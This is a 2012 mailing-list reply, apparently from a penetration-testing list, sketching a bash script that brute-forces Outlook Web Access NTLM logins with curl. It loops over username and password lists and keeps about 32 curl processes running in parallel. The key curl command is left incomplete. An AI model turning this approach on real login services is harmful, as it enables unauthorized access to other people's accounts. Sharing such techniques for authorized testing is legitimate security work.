PaulDotCom mailing list archives

Re: hydra and HTTP NTLM

From: Sherif El-Deeb <archeldeeb () gmail com>
Date: Fri, 25 May 2012 23:59:34 +0300

Back when nothing was supporting Outlook Web Access bruteforcing, I've
written a simple bash script that automated the process using "curl"... I
suggest you do the same.

"curl --ntlm" -> it will be two nested for loops, the outer iterates
through usernames, the inner iterates through passwords... then process
server's answer using multiple grep and cut to check for correct/bad
credentials using variables and "if".

The only problem with that method will be the speed(lack of), so, I have
included a simple function to make sure at least "32" instances of curl are
running at any given time

===== start of code example=====
#!/bin/bash
CheckCurl(){
CurlCount=$(pidof curl | wc -w)
[ $CurlCount -ge 32  ] && CheckCurl
}

echo [*] Starting...
for USER in $(cat $userList)
do
        for PASSWORD in $(cat $passList)
        do
#before running the command, we want to make sure that the running
instances of curl are not greater than 32
                CheckCurl
#note that this will save the output to a folder called "html_out", change
that or create it.
                curl --ntlm -u 'domain\ $USER:$PASSWORD' blah blah blah
blah ....... & # the ending ampersand is very important for multithreading
        done

done

===== End of code example=====

Hope that helps,